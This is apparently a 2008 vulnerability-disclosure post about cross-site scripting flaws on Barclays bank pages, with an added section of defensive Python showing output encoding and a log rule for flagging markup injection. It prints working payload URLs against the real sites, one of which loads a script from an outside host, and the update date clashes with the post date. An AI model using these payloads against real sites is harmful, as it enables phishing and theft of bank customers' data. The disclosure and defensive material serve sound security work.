 Barclays XSS vulnerability comes handy for scammers and blackhat hackers

Written by DP

Sunday, 11 May 2008

Update (13/05/07):
One more XSS on www.barclays.co.uk (submitted by TreX):
http://www.barclays.co.uk/insurance/home-insurance/?campaignCode="><script>alert('XSS')</script>

Mirror:
http://www.xssed.com/mirror/38364/

--
Bank websites which are vulnerable to cross-site scripting are critically susceptible to fraud, and this is a well-documented fact!

Strict case management and monitoring of security vulnerabilities should have prevented 100% of site-specific vulnerabilities.

Barclays is one of the largest UK banks and a gold target for scammers hunting the pound notes.
In this case, exploiting trust is an easy game to play for phishers and blackhat hackers.

Barclays web security staff ignore the security risks that come with cross-site scripting. An example of this ignorance is another Barclays bank XSS which has remained unfixed for over a year:

http://www.newsroom.barclays.co.uk/search/default.asp?searchText=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E

To me, this illustrates that they do not place a high value on their customers' privacy and security.

Mirror:
http://www.xssed.com/mirror/6709/

Malicious minds can exploit this XSS vulnerability to infect users with crimeware and steal customer bank accounts, credit card details and other sensitive personal information. They can even ask Barclays customers to donate money for the Myanmar cyclone victims.

Barclays XSS (discovered and submitted by Skyr3x):
http://www.barclays.co.uk/credit-cards/index.htm?TC=%22%3E%3C/script%3E%3Cscript%3Ealert("XSS");%3C/script%3E

Mirror:
http://www.xssed.com/mirror/38102/
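To make the defect behind these reports concrete from the defender's side, here is an added example; it is not code from xssed.com, from the submitters or from Barclays. It assumes (the `">` prefix of the published payloads points this way) that the `TC` and `campaignCode` parameters were reflected verbatim into a double-quoted HTML attribute. The template, the function names (`render_unsafe`, `render_safe`, `looks_like_markup_injection`) and the access-log lines are all invented for illustration; the parameter values are the payload strings quoted above. It shows the reflection breaking out of the attribute, the same template with HTML attribute encoding applied, and a cheap log triage rule for spotting requests that carry markup in a query value.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample inputs (not captured traffic): the parameter values are
# the payload strings the advisory quotes, on the same page paths.
SAMPLE_URLS = {
    "TC": "http://www.barclays.co.uk/credit-cards/index.htm?TC="
          "%22%3E%3C/script%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E",
    "campaignCode": "http://www.barclays.co.uk/insurance/home-insurance/"
                    "?campaignCode=\"><script>alert('XSS')</script>",
}


def param_from_url(url: str, name: str) -> str:
    """Return the first percent-decoded value of query parameter `name`."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get(name, [""])[0]


def render_unsafe(name: str, value: str) -> str:
    """Hypothetical vulnerable template: the parameter is reflected verbatim
    into a double-quoted attribute. A value starting with '">' closes the
    attribute and the tag, and whatever follows becomes new markup."""
    return f'<input type="hidden" name="{name}" value="{value}">'


def render_safe(name: str, value: str) -> str:
    """Same template with HTML attribute encoding. html.escape(quote=True)
    turns & < > " ' into entities, so the value can neither terminate the
    attribute nor open a tag. This encoder is correct for HTML text and
    attribute contexts only; a value placed inside a <script> block or a
    URL needs a context-specific encoder instead."""
    return f'<input type="hidden" name="{name}" value="{html.escape(value, quote=True)}">'


def script_tags_opened(markup: str) -> int:
    """Crude oracle: count the <script> tags the rendered markup opens."""
    return len(re.findall(r"<script\b", markup, flags=re.IGNORECASE))


# --- detection: triage an access-log line for a reflected-markup probe ------
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def looks_like_markup_injection(log_line: str) -> bool:
    """Flag a request whose decoded query values contain '<' or '">'.
    Cheap enough for a WAF or SIEM rule to watch a known-unfixed parameter;
    measure the false-positive rate on real traffic before alerting on it."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return False
    query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    return any("<" in v or '">' in v for values in query.values() for v in values)


# Constructed log lines in Common Log Format (invented addresses and sizes).
SAMPLE_LOG = [
    '203.0.113.7 - - [11/May/2008:09:12:01 +0100] "GET /credit-cards/index.htm'
    '?TC=%22%3E%3C/script%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E HTTP/1.1" 200 5120',
    '203.0.113.8 - - [11/May/2008:09:12:02 +0100] "GET /credit-cards/index.htm'
    '?TC=SPRING08 HTTP/1.1" 200 5120',
]


if __name__ == "__main__":
    for name, url in SAMPLE_URLS.items():
        value = param_from_url(url, name)
        print(name, "unsafe opens", script_tags_opened(render_unsafe(name, value)),
              "script tag(s); encoded opens", script_tags_opened(render_safe(name, value)))
    for line in SAMPLE_LOG:
        print("probe " if looks_like_markup_injection(line) else "normal", line[:70])
```

The point of `render_safe` is that the fix is output encoding chosen for the context the value lands in, not input filtering of the word `script`; the log rule is deliberately broad, since the same parameter stays exposed to every variant of the payload until the encoding is fixed.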

We hope that they remediate this issue as soon as possible!
We suggest that all banks subscribe their online properties to the XSS early warning mailing list.

Interesting Reads:
"Bank's own developers a much bigger problem than browsers", mhp, Netcraft, 18 Jul 04
"[WEB SECURITY] XSS-Phishing on Financial Sites (Tip of the iceberg)", Jeremiah Grossman, WhiteHatSec, 23 Jun 06
"You can't Bank on Security", Edward Henning, Jürgen Schmidt, heise Security UK, 20 Sep 06
